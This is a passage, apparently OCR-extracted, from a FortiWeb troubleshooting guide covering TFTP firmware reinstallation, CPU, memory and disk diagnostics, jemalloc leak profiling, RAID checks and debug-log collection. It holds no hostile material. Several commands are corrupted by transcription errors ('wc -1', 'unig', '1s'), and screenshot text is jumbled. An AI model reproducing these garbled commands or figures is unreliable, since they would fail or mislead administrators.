authentication and could allow anyone to have read and write access, you
should only run it on trusted administrator-only networks, never on
computers directly connected to the Internet. If possible, immediately turn
off t ftpd off when you are done.

Verify that the TFTP server is currently running, and that the FortiWeb appliance can reach the TFTP
server.

To use the FortiWeb CLI to verify connectivity, enter the following command:
execute ping 192.0.2.168
where 192.0.2.168 is the IP address of the TFTP server.

Enter the following command to restart the FortiWeb appliance:
execute reboot

As the FortiWeb appliances starts, a series of system startup messages appear.
Press any key to display configuration menu........

Immediately press a key to interrupt the system startup.

ﬂ You have only 3 seconds to press a key. If you do not press a key soon
, enough, the FortiWeb appliance reboots and you must log in and repeat

the execute reboot command.

If you successfully interrupt the startup process, the following messages appears:

[G]: Get firmware image from TFTP server.

[F] Format boot device.

[B]: Boot with backup firmware and set as default.

[Q]: Quit menu and continue to boot with default firmware.
[H]: Display this list of options.

Enter G,F,B,Q,0or H:

Please connect TFTP server to Ethernet port "1".

If the firmware version requires that you first format the boot device before installing firmware, type F.
Format the boot disk before continuing.

Type G to get the firmware image from the TFTP server.

The following message appears:

Enter TFTP server address [192.0.2.168]:

Type the IP address of the TFTP server and press Enter.

The following message appears:

Enter local address [192.0.2.188]:

Type a temporary IP address that can be used by the FortiWeb appliance to connect to the TFTP server.
The following message appears:

Enter firmware image file name [image.out]:

Type the file name of the firmware image and press Enter.

The FortiWeb appliance downloads the firmware image file from the TFTP server and displays a message
similar to the following:

MAC:00219B8F0D94
g sssaaasdsasaaan s
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16.

17.

18.

19.

Total 28385179 bytes data downloaded.
Verifying the integrity of the firmware image..

Save as Default firmware/Backup firmware/Run image without saving:[D/B/R]?

If the download fails after the integrity check with the error message:
invalid compressed format (err=1)

, but the firmware matches the integrity checksum on the Fortinet Technical
Support website, try a different TFTP server.

Type D.

The FortiWeb appliance downloads the firmware image file from the TFTP server. The FortiWeb appliance
installs the firmware and restarts. The time required varies by the size of the file and the speed of your
network connection.

The FortiWeb appliance reverts the configuration to default values for that version of the firmware.

To verify that the firmware was successfully installed, log in to the CLI and type:

get system status

The firmware version number is displayed.

Either reconfigure the FortiWeb appliance or restore the configuration file. For details, see "How to set up
your FortiWeb" on page 1 and "Restoring a previous configuration" on page 1.

If you are downgrading the firmware to a previous version, and the settings are not fully backwards
compatible, the FortiWeb appliance may either remove incompatible settings, or use the feature’s default
values for that version of the firmware. You may need to reconfigure some settings.

Update the attack definitions.

Installing firmware replaces the current attack definitions with those included with the firmware release that
you are installing. After you install the new firmware, make sure that your attack definitions are up-to-date.
For details, see "Uploading signature & geography-to-IP updates" on page 1.

Checking System Resource Issues

Checking CPU information&Issues on page 57
Checking memory usage on page 60
Diagnosing memory leak issues on page 62
Checking disk information & issues on page 65

Checking CPU information&lssues

FortiWeb Trouble-shooting Guide

Check CPU information

FortiWeb# diagnose hardware cpu list #show the detail info for all CPU/vCPU
FortiWeb-AWS-MO01 # diagnose hardware cpu list

processor : 0

vendor id : GenuinelIntel

cpu family HI)

model : 79

model name : Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz

stepping 1
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microcode
cpu MHz
cache size
physical id
siblings
core id

cpu cores
apicid
initial api
fpu

23

cid
ye

fpu exception

cpuid level
wp

yes

0xb000038
00.049
46080 KB

s
yes
13
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CPU & processor numbers

/# grep "cpu cores" /proc/cpuinfo | unig

cpu cores : 16

/# cat /proc/cpuinfo |grep "processor" | sort -u | wc -1
cores when hyperthread is enabled

#Check physical CPU cores
#Check logical CPU

32

Check which daemon or process consuming the most CPU usage

To determine if high load is frequently a problem, you can display the average load level by using these CLI
commands:

FortiWeb # get system performance

CPU states: % used, 95% idle
Memory states: 29% used
Up: 9 days, 12 hours, 52 minutes.

top

Use the CLI to view the per-CPU/core process load level and a list of the most system-intensive processes.
This may show processes that are consuming resources unusually.

While the command is running, you can press Shift + P to sort the five columns of data by CPU usage (the
default) or Shift + M to sort by memory usage.
FortiWeb# diagnose system top 10
Mem: 4867300K used, 126120392K free, 16536K shrd, 10792K buff, 117620K cached
CPU: 0.1% usr 0.1% sys 0.0% nic 99.6% idle 0.0% io 0.0% irg 0.0% sirqg
Load average: 1.71 1.55 1.49 2/953 52110

PID PPID USER STAT  VSZ %VSZ CPU %CPU COMMAND

6262 1 root S 9582m 7.4 31 0.3 /bin/proxyd

6264 1 root S 6539m 5.1 29 0.0 /bin/bot_daemon

6273 1 root S 2498m 1.9 21 0.0 /bin/garbage -o standalone

6316 6238 root S 2098m 1.6 24 0.0 /bin/mysgld --defaults-file=/data/e
6251 1 root S 803m 0.6 10 0.0 /bin/monitord

6269 1 root S 411m 0.3 21 0.0 /bin/sandboxd

6271 1 root S 400m 0.3 43 0.0 /bin/shibd -F -f -p /var/run/shibd.
6287 1 root S 256m 0.2 59 0.0 /bin/statusd

The above command generates a report of processes every 10 seconds. The report provides the process
names, their process ID (pid), status, CPU usage, and memory usage.

The report continues to refresh and display in the CLI until you press q (quit).
perf top

The perf top command is used for real time system profiling and functions similarly to the top utility.
However, where the top utility generally shows you how much CPU time a given process or thread is using,
perf top shows you how much CPU time each specific function uses. In its default state, perf top tells you
about functions being used across all CPUs in both the user-space and the kernel-space.
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FortiWeb# diagnose system perf # or “perf top” in backend shell
FortiWeb# diagnose system perf
PerfTop: 69182 irgs/sec kernel:96.4% exact: 100.0% lost: 0/0 drop: 0/0

[4000Hz cycles], (all, 64 CPUs)

13.50% [kernel] [k] find busiest group
3.20% [kernel] [k] idle cpu

3.15% [kernel] [k] raw spin lock

2.44% [kernel] [k] _ schedule

2.42% [kernel] [k] rcu sched clock irqg
2.07% [kernel] [k] raw spin trylock
1.95% [kernel] [k] native irq return iret

4. Kill processes
Once you locate an offending PID from “diagnose system top”, you may want to terminate it. For example,
in a test environment or when you fail to locate the cause when access to a server-policy always fails, you
may try to kill proxyd or dnsproxyd.
Under normal conditions, killing a process is not recommended.
diagnose system kill 9 <pid>
or
Fn kill 9 <pid>

5. Checkif high CPU usage is caused by heavy traffic load
Heavy traffic loads can cause sustained high CPU or RAM usage. If this is unusual, no action may be
required, unless you are being subject to a DoS attack. Sustained heavy traffic load may indicate that you
need a more powerful model of FortiWeb.

You can check traffic load via GUI or debug logs in several ways:

1) Monitor Total Connection per Second, Total Connections and Total HTTP Transaction, Throughput on
the GUI dashboard.

Total Connection per Second, Total Connections (also Concurrent Connection) are displayed directly in
the widgets “System Resource” and “Policy Sessions”, whereas the current HTTP transaction per second
is not displayed directly on GUI. You need to enable/add a widget named “HTTP Transactions” and
calculate the TPS by dividing the total transaction in 5 minutes.

Taking the screenshot below for example, the concurrent connection is 100000 and there are no new
connections established per second, whereas there are nearly 6000000 transactions in the past 5 minutes
- equal to 20000 transactions per second (TPS), so this might be the main cause why CPU usage reaches
10%.

Time Interval 1Hour~ Policy aping_bilyoner_com~ & i~ ||System Resources Z i~ ||Policy Sessions [ A
7000000

{17:38-17:43
Hit: 5999498
6000000 p—o——o—o o

CPU

# PolicyName  Status Concurrént Connections/Sec
Connections

| Memory Usage 1 www_bilyone a, 0
5000000 r_com

‘; m_bilyoner ¢ o
4000000 f Log Disk Usage 2 o % 0 0
3000000 [ 3 apinebilyone o gosgg 0

r_com

2000000

1000000

G—o—0

0
16:53-16:58 17.08-17:13 17:23-17:28 17:48-17:53

2) Check TCP connections in TIME_WAIT status

TIME_WAIT connections cannot be displayed in dashboard widgets but also consume system
connection/memory resources. You can also check connection in backend shell:
/# netstat -nat | awk '{print $6}' | sort | uniq -c | sort -r

199101 ESTABLISHED #Concurrent connections
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251 LISTEN
7 TIME WAIT
1 established)
1 Foreign

3) Examine traffic history in the traffic log. Go to Logs&Report > Log Access > Traffic.
If massive traffic logs are generated in a short period, it indicates heavy traffic load.
Check if high CPU usage is caused by Attacks

A prolonged denial of service (DoS) or brute-force login attack (to name just a few) can bring your web
servers to a standstill, if your FortiWeb appliance is not configured for it.

In the FortiWeb appliance's web Ul, you can watch for attacks in two ways:
1) Monitor current HTTP traffic on the dashboard. Go to System > Status > Status and examine the
attack event history graph in the Policy Summary widget.
2) Examine attack history in the traffic log. Go to Logs&Report > Log Access > Attack.
Before attacks occur, use the FortiWeb appliance's rich feature set to configure attack defenses.
Check system and debug logs to see CPU resource status:
1) Log&Report > Event > Filter > Action > check-resource
Log example:
CPU usage too high,CPU usage is 95, process proxyd
2) Analyze NMON files with all relevant statistics

NMON files include CPU, Mem, I/O statistics, you can do a comprehensive analysis from these relevant
information.

Checking memory usage

2,
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Use “diagnose debug memory” to check memory usage:
This command will collect memory information via several different kinds of backend commands.

FortiWeb# diagnose debug memory
Tue Oct 26 17:42:56 UTC 2021

17:42:56 up 5 days, 19:45, 1load average: 2.09, 1.78, 1.82

init 1 shared 1528kB anonymous 112kB
cmdbsvr 191 shared 17132kB anonymous 33688kB
syslogd 873 shared 256kB anonymous 44kB
klogd 874 shared 256kB anonymous 48%kB
hamain 875 shared 10632kB anonymous 6972kB
hasync 876 shared 9328kB anonymous 6832kB

After 6.4 release, the system will generate a regular monitoring file with a backend command
“/bin/FortiWeb_get_memory_usage”, which includes the same output of “diagnose debug memory”.

The regular output is recorded in /var/log/gui_upload/debug_memory.ixt and can be downloaded via
System > Maintenance > Backup&Restore. You can download it manually or use the one-click button to
archive and download it.

You can set the interval to record debug memory logs:

config system global
set debug-memory-interval 5 #default 5 minutes and the range is from 1 to
65535

end
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/# more /var/log/gui upload/debug memory.txt
Fri May 28 04:30:13 UTC 2021
04:30:13 up 0 min, load average: 1.07, 0.26, 0.09

init 1 shared 1376kB anonymous 104kB
cmdbsvr 2293 shared 14044kB anonymous 29032kB
syslogd 3457 shared 280kB anonymous 48kB

3. Check current memory usage in backend shell:
Please note that FortiWeb changes the way to login to the backend shell Refer to Part VI: Run backend-
shell commands.
free
This command gives you a table of the total, used, free, shared, buffer/cache, and available RAM. It also
shows the total amount of swap space configured, and how much is used and available. The default unit is

KB.
free= total — used - buff/cache
/# free
total used free shared
buffers cached
Mem: 130987692 4990340 125997352 16540 23576 129092
-/+ buffers/cache: 4837672 126150020
Swap: 0 0 0

Iproc/meminfo

This is a virtual file that reports the amount of available and used memory. It contains real-time information
about the system’s memory usage as well as the buffers and shared memory used by the kernel
/# cat /proc/meminfo

MemTotal: 28635360 kB
MemFree: 25998836 kB
MemAvailable: 26127368 kB
Buffers: 201340 kB
Cached: 192220 kB
SwapCached: 0 kB
Active: 1730772 kB
Inactive: 164688 kB
Active (anon) : 1501972 kB
Inactive (anon) : 38064 kB
Active (file): 228800 kB
Inactive (file) : 126624 kB
Unevictable: 1164 kB
Mlocked: 1164 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 104 kB
Writeback: 0 kB
AnonPages: 1503120 kB
Mapped: 89856 kB
Shmem: 38164 kB
KReclaimable: 22528 kB
Slab: 94268 kB
SReclaimable: 22528 kB
SUnreclaim: 71740 kB
KernelStack: 5536 kB
PageTables: 12048 kB
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NFS Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 14317680 kB
Committed AS: 5405984 kB
VmallocTotal: 34359738367 kB
VmallocUsed: 64024 kB
VmallocChunk: 0 kB
Percpu: 1984 kB
DirectMap4k: 63424 kB
DirectMap2M: 3082240 kB
DirectMaplG: 28311552 kB
# top

Some common usage: Press Shift + P to sort the five columns of data by CPU usage (the default) or Shift +
M to sort by memory usage; Press “1” (number one) to check status of all logical processors.

/# top

Mem: 4919392K used, 126068300K free, 16348K shrd, 45984K buff, 134312K cached

CPU: 0.1% usr 0.0% sys 0.0% nic 99.8% idle 0.0% io 0.0% irg 0.0% sirqg

Load average: 1.33 1.40 1.38 2/954 28663

PID PPID USER STAT VSZ %VSZ CPU %CPU COMMAND
6262 1 root S 9582m 7.4 55 0.0 /bin/proxyd
6276 1 root S 224m 0.1 39 0.0 /bin/confd ha
6264 1 root S 6539m 5.1 24 0.0 /bin/bot daemon

6273 1 root S 2498m 1.9 60 0.0 /bin/garbage -o standalone
6316 6238root S 2098m 1.6 7 0.0/bin/mysqld --defaults-file=/data/etc

6251 1root S 803m 0.6 12 0.0 /bin/monitord

6269 1root S 411m 0.3 17 0.0 /bin/sandboxd

6271 1root S 400m 0.3 41 0.0/bin/shibd -F -f -p /var/run/shibd.pi
6287 1root S 256m 0.2 59 0.0 /bin/statusd

6257 1root S 245m 0.1 63 0.0 /bin/wvsd

6244 1root S 219m 0.1 36 0.0 /bin/logd

6272 1root S 202m 0.1 26 0.0 /bin/fortiviewd

Diagnosing memory leak issues

When you find the memory usage is very high and increases very fast in a short time period, it might be a
memory leak issue, and you can analyze by the following steps.

Please note memory increase does not always mean a memory leak. A memory leak issue usually has these
phenomena:

« Very fast and abnormal memory increase (usually with common or low traffic level)
« Continuous memory increase without deallocated
« Used memory are not deallocated even after traffic drops or stopped

The most important thing for troubleshooting a memory leak issue is to locate which module, process or function
causes the memory increase.

1. Check history logs to see memory resource status:
Log&Report > Event > Filter > Action > check-resource
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failure msg="mem usage raise too high,mem(67)
2. Check if there are some memory related print outputs in the console.

3. Check connection amounts to see if memory increase is possibly caused by too many concurrent
connections.
/# netstat -nat | awk '{print $6}' | sort | unig -c | sort -r
319800 ESTABLISHED
330 FIN WAIT2
251 LISTEN
7 TIME WAIT
1 established)
1 SYN SENT
1 Foreign
If there are too many TIME_WAIT or FIN_WAIT2 connections, it may be abnormal because connections
are not closed normally.

If memory usage still does not decrease when TIME_WAIT or FIN_WAIT2 are released, it may mean
memory leak.

4. Execute “diagnose debug memory” several times, then compare the diff of the output to find which
part/module/process has the most increase.
According to the memory increment speed, you may adjust the interval to execute the command and
collect the output.

5. Usediagnose debug jemalloc-heap & diagnose system jeprof totrace and analyze
memory occupation and cause of memory usage over a period of time.
« Ifthe jemallc profile is activated and the memory usage exceeds the configured threshold, the heap file
will be generated in directory /var/log/gui_upload.

« You can use jemalloc-heap to show or clear the heap files. At most 10 heap files are kept on the
device.

« You can use jeprof to parse the heap file via jeprof tool

« The jemalloc commands don't give us useful information when the memory doesn'tincrease.
1) Enable jemalloc profile

FortiWeb# diagnose debug jemalloc-conf proxyd enable
2) if memory increases quickly, execute below command to generate dump files.

E.g., you can wait the memory usage to increase 10% and execute below commands; and it’s better
to repeat this commands for several times when memory increases every 10%:

FortiWeb# diagnose debug jemalloc proxyd dump
3) Check the dump heap file generated:

FortiWeb # diagnose debug jemalloc-heap show
Jjeprof.out.28279.1641342474 .heap
Jjeprof.out.4973.1641276249.heap
4) After getting a few heap file, execute below command to parse the heap file

FortiWeb # diagnose system jeprof proxyd

Using local file /bin/proxyd

Using local file /var/log/gui upload/jeprof.out.28279.1641342474.heap

Total: 124422365 B

34403589 27.7% 27.

34262011 27.5% 55.
18062121 14.5% 69. 18062121 14. CRYPTO zalloc

17011023 13.7% 83. 17011023 13. _http init

9905760 8.0% 91.3% 9905760 8.0% BUF MEM grow

3195135 2.6% 93.9% 3195135 2.6% buffer new

1583640 1.3% 95.2% 18857320 15.2% http substream process ctx create

34403589 27.
34262011 27.

ssl3 setup write buffer
ssl3 setup read buffer

B N S EEN
o o° oo o°
~ o 0

o® o0 oo oo
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Using local file /bin/proxyd

Using local file /var/log/gui upload/jeprof.out.4973.1641276249.heap
Total: 576387295 B

175840569 30.5% 30.5% 175840569 30.5% ssl3 setup write buffer
175415833 30.4% 60.9% 175415833 30.4% ssl3 setup read buffer
81823328 14.2% 75.1% 81823328 14.2% CRYPTO zalloc

72087699 12.5% 87.6% 72612307 12.6% _http init

8578052 1.5% 89.1% 84473564 14.7% http substream process ctx create

7654262 1.3% 90.5% 7654262 1.3% asnl_enc_save

7311586 1.3% 91.7% 7311586 1.3% http get modify value by name
6855757 1.2% 92.9% 6855757 1.2% pt stream create svrinfo
5851046 1.0% 93.9% 5851046 1.0% _hlp parse_cookie

5136808 0.9% 94.8% 5136808 0.9% http process ctx create
5) Use graph tool to analyze the function call relationship from .heap files

This tool is for internal R&D investigation only. Just for reference.

« Generate a .dot file on FortiWeb backend shell:
jeprof --dot /bin/proxyd jeprof.out.4973.1641276249.heap > 1641276249.dot
« Copy 1601044510.dot to ubuntu;
« Install graphviz on Ubuntu:
apt install graphviz
« Generate a png picture:
dot -Tpng 1641276249.dot -o 1641276249.png

A png image will be generated as below, indicating the top memory usage functions, and function
call relationship. Taking the case below for example, one can check if HTTPS traffic load increased or
related configuration is changed.

_corvectly_grouped_prefiwe
00 (00%)
of 3577 (65.1%)

42.7

4.0

ssl3 setup read buffer| |ssl3 setup write buffer -
167.3 (30.4%) 167.7 (30.5%)

7.3 5.3 9.8

el e
T0.0%)
€98 ILE%)

10.5 25.3 9.8

o107 01.9%)

6) You can also download the jeprof.out files and provide them to support team for further

investigation:
/var/log/gui upload# ls jeprof.out* -1
—rw-r--r--— 1 root 0 109251 Sep 27 18:30

Jeprof.out.11164.1632789019.heap
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—rw-r--r-—- 1 root 0 111975 Dec 22 12:22
jeprof.out.3777.1640200954.heap

Note: In jeprof.out.3777.1640200954.heap:
3777 is the PID of proxyd

1640200954 is the UNIX timestamp; one can use online tools to convert it to a human-readable date
so as to just pay attention to recent dump files. This is useful to confirm the recent & current coredump
files if there are many files.

E.g.
Epoch Converter - Unix Timestamp Converter

@ EpochConverter

Epoch & Unix Timestamp Conversion Tools

The current Unix epoch time is 1640979152

Convert epoch to human-readable date and vice versa

1640200954 | Timestamp to Human date | [batch convert]

Supports Unix timestamps in seconds, milliseconds, microseconds and nanoseconds.

Assu ming that this timestamp is in seconds:

: Wednesday, December 22, 2021 7:22:34 PM
m Wednesday, December 22, 2021 11:22:34 AM GMT-08:00
Relative : 9 days ago

6. As stated in point 2, after 6.4.0 GA release, a regular monitoring file is generated as /var/log/gui_
upload/debug_memory.txt. One can set a memory boundary for it: if the memory usage reaches the
boundary and proxyd or ml_daemon is the top 10 high memory usage, it will enable their jemalloc debug
function automatically.

FortiWeb # show full system global
config system global

set debug-memory-boundary 70 #memory usage percentage, 1%-100%
End

Checking disk information & issues
1. Check hard disk & raid info:

FortiWeb# diagnose hardware harddisk list
name size (M)
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sda 959656.76
sdb 8012.39

FortiWeb # diagnose
Filesystem
/dev/ram0

none

none

/dev/sdbl

/dev/sdb3

/dev/sdal

system mount list
Used Available Use%

1M-blocks
473

1164

3880

362

91

449651

310
31

3
254
0
7771

FortiWeb# diagnose hardware logdisk info

disk number: 1

disk[0] size: 937.16GB

raid level: raidl
partition number: 1

mount status: read-write

2. Check RAID information:

FortiWeb# diagnose hardware raid list
level size (M) disk-number
raidl 899811 0 (OK) , 1 (OK)

FortiWeb# diagnose hardware raid-card info

FW Package Build: 50

MegaCli

.5.0-1121

162
1132
3877

89
86
418971

65%
2%
0%

74%
0%
1%

66

Mounted on
/

/ tmp
/dev/shm
/data
/home
/var/log

Usually we need to pay attention to fields like below when checking the output:

« Slot number and device ID

« Firmware status (a failed disk will show Failed)

« Fields including “Error”
/# MegaCli -PDList -aALL

Adapter #0

Enclosure Device ID:
Slot Number: 0

Drive's position: DiskGroup:

69

Enclosure position: N/A

Device Id: 1

WWN: 55cd2e4152c655b7

Sequence Number: 2
Media Error Count: O
Other Error Count: O

Predictive Failure Count: 0

Last Predictive Failure Event Seq Number:

PD Type: SATA

Raw Size: 894.252 GB
Non Coerced Size: 893.752 GB
Coerced Size: 893.75 GB

Sector Size: 512
Logical Sector Size:

[Ox6fc81lab0 Sectors]
[0x6fb81lab0 Sectors]
[0x6fb80000 Sectors]

512

Physical Sector Size: 4096

Firmware state: Online,
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Commissioned Spare : No

Emergency Spare : No

Device Firmware Level: 0120

Shield Counter: 0

Successful diagnostics completion on : N/A
SAS Address (0): 0x300605b00£3769el
Connected Port Number: 0 (pathO)

Inquiry Data: BTYG030302SJ960CGN INTEL SSDSC2KG960G8 XCv10120
FDE Capable: Not Capable

FDE Enable: Disable

Secured: Unsecured

Locked: Unlocked

Needs EKM Attention: No

Foreign State: None

Device Speed: 6.0Gb/s

Link Speed: 6.0Gb/s

Media Type: Solid State Device

Drive Temperature :13C (55.40 F)

PI Eligibility: No

Drive is formatted for PI information: No

PI: No PI
Drive's NCQ setting : Enabled
Port-0

Port status: Active
Port's Linkspeed: 6.0Gb/s
Drive has flagged a S.M.A.R.T alert : No

3. Initialize RAID:
Use the this command to initialize the RAID

Currently, only RAID level 1 is supported, and only on FortiWeb 1000B/C/D/E, 2000E, 3000C/CFsx, 3000E, and
4000E shipped with Fortiweb 4.0 MR1 or later.

FortiWeb# execute create-raid level raidl
4. Rebuild RAID:
Use this command to rebuild the RAID.

Currently, only RAID level 1 is supported, and only on FortiWeb-1000B, 1000C, 3000C/CFsx, 3000E, and
4000E shipped with FortiWeb 4.0 MR1 or later.

FortiWeb# execute create-raid rebuild
This operation will clear all data on disk :0!
Do you want to continue? (y/n)

Retrieving system&debug logs

To troubleshoot system level issues, we often need to analyze system logs. Some of these logs are generated
by daemons while some others are generated by scripts, which run periodically in the background to record
system resource changes, statistics, etc.

Please collect such logs for further investigation.
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Retrieving system logs in backend system

1. dmesg

Dmesg is used to examine or control the kernel ring buffer. It includes all important kernel information such as
hardware loading and call trace information. Kernel level traffic debug logs will be also included in dmesg.

One can check such logs with “# dmesg” or “#dmesg | grep xxx”directly;

For further troubleshooting, you can archive all logs under the directory /var/log/dmesg/:
tar czf /var/log/gui_upload/dmesg.tar.gz /var/log/dmesg/

2. Apache error logs

If one failed to do some GUI related operation, please collect this logs for analysis:
/var/log# ls apache logs/

error log

3. CMDB logs

For configuration deployment issues, please collect cmdb logs for analysis:

# 1s /var/log/cmdb/cmdb.log.*
cmdb/cmdb. log.0 cmdb/cmdb.log.155 cmdb/cmdb.log.211 cmdb/cmdb.log.44
#ls /var/log/dbg cli/

4. /var/log/debug/

Some real-time logs will be generated and stored at /var/log/debug/:

/# ls /var/log/debug/

collect tcpdump para.txt daemon_ log flag proxyd dbg

coredump log flag dbsync_ log sample

crash.log kernel.log system-startup.log

crash log flag kernel log flag tmp

crl updated dbg netstat log flag daemon.log nstd

5. /var/log/gui_upload/

1) Core, coredump and some real-time logs will be generated and stored at /var/log/gui_upload/:

/# ls /var/log/gui_upload/

core-proxyd-2141-1630609770 dlog logd ha event log
core-proxyd-7794-1630610047 ints.txt debug disk.txtirg
Jeprof.out.51146.1630448785.heap perf.data kern.log

debug out d cond cpu.sh.txt debug out d mem.sh.txt debug out d

net.sh.txt
debug out d proc.sh.txt

2) Some logs named as “debug_<function name>.txt” (or with the prefix “debug_out_d_" in some intermediate
builds) are generated after 6.4.1.

« Scripts in /var/log/debug/sample/ are samples to run in /var/log/outgoing;

« Scripts in /var/log/outgoing/ are scripts actually run in /var/log/outgoing;

« Currently these system information are collected:

/# 1ls /var/log/debug/sample/ #script samples

README d cond cpu.sh d mem.sh d net.sh d proc.sh first
flag - B B - N B

/# 1ls /var/log/outgoing/ #scripts actually run
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d cond cpu.sh d mem.sh d net.sh d proc.sh

/# 1s -1 /var/log/gui_upload/debug out d * (in new builds files are debug
<function name>.txt)

-rw-r--r-- 1 root 0 65018 Sep 28 18:03 /var/log/gui_
upload/debug out d cond cpu.sh.txt

-rw-r—--r—-— 1 root 0 119859 Sep 28 18:03 /var/log/gui
upload/debug out d mem.sh.txt

—-rwWw-r—--r—-— 1 root 0 66371 Sep 28 18:03 /var/log/gui
upload/debug out d net.sh.txt

—rwW-r—--r-—- 1 root 0 126484 Sep 28 18:03

/var/log/gui upload/debug out d proc.sh.txt
« The information collected by these scripts mainly include:

d_cond_cpu.sh: If the CPU usage more than 90% - date, top 10 daemons of CPU usage, perf top for 10
seconds

d_mem.sh: date, free, /proc/meminfo, etc.
d_net.sh: date, netstat -natpu, route -n
d_proc.sh: date, top -b -n1, ps

« The running interval for these scripts can be set with CLI:

FortiWeb # show full system global
config system global

set debug-monitor-interval 5 #minutes
End

If the script is blocked for 30 sec, the system will kill it and call it in the next debug-monitor-interval.
« If necessary, one can add scripts (shell or python) to this directory to collect system information; (NOT
Recommended, because too many these manually-added tasks may impact system running & stability)

« The size of “debug_<function name>.txt” is limited to 25MB. If the size gets greater, it will be moved to an
.old file. And there are only two files rotated.

3) NMON logs are generated after 6.4.0.

NMON (shorthand for Nigel's Monitor) is a system monitor tool that can collect system performance statistics
including CPU, Mem, Disk, Net, etc.

« NMON log files (with a suffix .nmon) are generated automatically and stored at /var/log/debug/tmp, and will
be archived and can be downloaded via the method described in below section 10.2. The maximum
number of .nmon files stored is 180.

« A .nmon file is generated with a sampling interval of 5 minutes, and each time when system boots up, a
new .nmon file will be generated. So generally only one .nmon file named “FortiWeb_220107_1734.nmon”
(may be different on some previous builds) will be generated each day. Multiple .nmon files generated in
one day indicate that system rebooted or crashed.
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.?| GA\Downloads\console_log.tar.gz\console_log.tar\var\log\debug\http_download_logh,

Mame Size  Packed Size Modified Mode User Group
corefproxydf1 9284-1623682574.9z 38557990 38558208 2021-10-2201:26 -rw------- root 0

[Bz] core-proxyd-20764-1620056130.9z 67 661 931 67 662 336 2021-10-22 01:26 -rW------- root 0

[Bz] core-proxyd-24022-1623588026.9z 62 206 015 62 206 464 2021-10-22 01:27 -rw------- root 0

|j coredump A77 512 2021-10-2201:26 -rw-r--r-- root 1]

|j crash 0 0 2021-10-22 01:26 -rw-r--r-- root 0

|j daemon 6 690 503 6690816 2021-10-22 01:26 -rw-r--r-- root 1]

E| debug_disk.txt 8 888 693 8888832 2021-10-2201:26 -rw-r--r-- root 0

[ 1jeprof.out.3271.1629878388.heap 134 308 134 656 2021-10-22 01:26 -rw-r--r-- root 0

|j kernel 0 0 2021-10-2201:26 -rw-r--r-- root 0

|j netstat 1] 0 2021-10-2201:26 -rw-r--r-- root 1]

|j sn.txt 96 512 2021-10-22 01:27 -rw-r--r-- root 0
,lu;'WAF_WPA_PIO_21092?_1122.nmon 81069 81408 2021-10-2201:26 -rw-r--r-- root 0
ﬁ'WAF_WPA_PIO_21 0927_1348nmon 538 481 538624 2021-10-2201:26 -rw-r--r-- root 0
,IL";’WAF_WPA_PIO_N0928_1348.nm0n 563 665 563712 2021-10-22 01:26 -rw-r--r-- root 0
ﬁ'WAF_WPA_PIO_210929_134S.nm0n 576 816 577024 2021-10-2201:26 -rw-r--r-- root 0
,IL";’WAF_WPA_PIO_N093[}_1348.nm0n 576 568 577024 2021-10-2201:26 -rw-r--r-- root 0
ﬁ'WAF_WPA_PIO_21 1001_1348.nmon 574 588 574976 2021-10-2201:26 -rw-r--r-- root 0
,'“_";’WAF_WPA_PIO_N 1002_1348.nmon 574 603 574976 2021-10-2201:26 -rw-r--r-- root 0
"_""jWAF_WPA_PIO_N 1003_1348.nmon 575016 575488 2021-10-2201:26 -rw-r--r-- root 0
After processed by an nmon analyzer:

H - = FWB Device_211021_1349.nmon.xIsx - Excel m - a X
Home Insert Pagelayout Formulas Data Review View  Q Tell me what youwant to do.
Al - S v

,Lsamiles C - Fiu‘D 13:‘;:39 L:“ 854:39 H J K L M N o P Q S T u v w X |-

System Summary FWB_Sample 10/21/2021
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26
27
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——CPU% ——I0/sec

- 1000

- 900

9
10
1 80 - 800
12
13 70 - 700

- 600

- 500

Disk xfers

- 400

- 300

29
30
31

32 Disk tps statistics cPU:

33 Avg disk tps during an interval: 750
877

BBBP

Avg
34 Max disk tps during an interval: Max

> SYS_SUMM | AAA | PIVOTCHART

DISK_SUMM

User%  Sys%  Wait%
8.0 1.8 211
13.5 2.9 23.0

CPUALL | CPU_SUMM

Idle%
69.1
72.1
DISKBSIZE

CPU%

9.8
16.4

DISKBUSY | DISKI... @

Customizing&downloading debug logs

There are several ways to collect or customize debug logs.

1.

Many debug logs are stored at /var/log/gui_upload and can be downloaded via GUI:

a. Enable upload/download option in CLI first, then you'll see the section GUI File Download/Upload in
System > Maintenance > Backup & Restore:

config system settings

set enable-file-upload enable
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FortiWweb-VM VM 01
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@ Dashboard > Backup &Restore | FTPBackup  Local Backup &Restore “
b Network > [ GUIFile Download/Upload | -
I £¥ System v Cloor Al
lear All
Firewall >
Config > Partition Last Modify Time Size Delete Compress Download
High Availability > || debug_disk.txt Sat Jan 8 09:55:03 2022 84.04 KB o] ," &
Admin > || debug_out_d_procsh.txt Sat Jan 809:55:01 2022 40015K8B & » &
Maintenance ~ | debug_out_d_cond_cpush.txt Sat Jan 8 09:55:01 2022 383.58 KB @ -~ L
e debug_out_d_mem.sh.txt Sat Jan 809:55:01 2022 40707KB & ,-f &
Firmware debug_out_d_netsh.txt Sat Jan 809:55:01 2022 38214 KB ® > &
System Ti
ystem Hime debug_disk txt.gzgz Fri Jan 7 23:35:23 2022 35.91KB ® # &
Debu;
= € ha_event_log Fri Jan 7 17:46:06 2022 123M8 o] - &
WX Security Fabric >
. perfdata Wed Jan 5 10:15:36 2022 17.14MB @ * &
User >
» b , || pertdatacld Thu Dec 16 11:05:26 2021 17.29MB @ » &
olicy
= ) diog_logd Wed Jan 5 10:15:21 2022 0008 o] # &
& Server Objects >
o core-proxyd-1764-1639717709 Thu Dec 16 22:08:30 2021 16768 & * &
+¢ Application Delivery >
@ Web Protection > )
- e o —GUI File Upload
ecurity >
o FromFile @ Upload
¥ Bot Mitigation >
Upload
2 APl Protection ,
L RN S .
Q

b. Select, compress and download debug logs or core/coredump files that you need.
You can also login the backend shell, move or copy logs files from other directories to /var/log/gui_
upload, and download them here.
2. One-click to archive and download most important logs (Recommended Way)

FortiWeb GUI provides a more easier way to collect such debug logs. Most logs under /var/log/debug/
and /var/log/gui_upload will be archived after you click the “Download” button on System > Maintenance
> Debug > Download section.

Before you can begin downloading the debug log, you have to enable it first via System > Config >
Feature Visibility > Debug.

Please note that some logs and core/coredump files may not be included in this archive file, so you may
need to download them manually with the 1st method.
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¥ System v “| Feature Visibility

Ll g System Features

Network >

Firewall ) & Traffic Mirror

Config v @ Replacement Message for AJAX requests
Operation © Firewall
Config-Synchronization
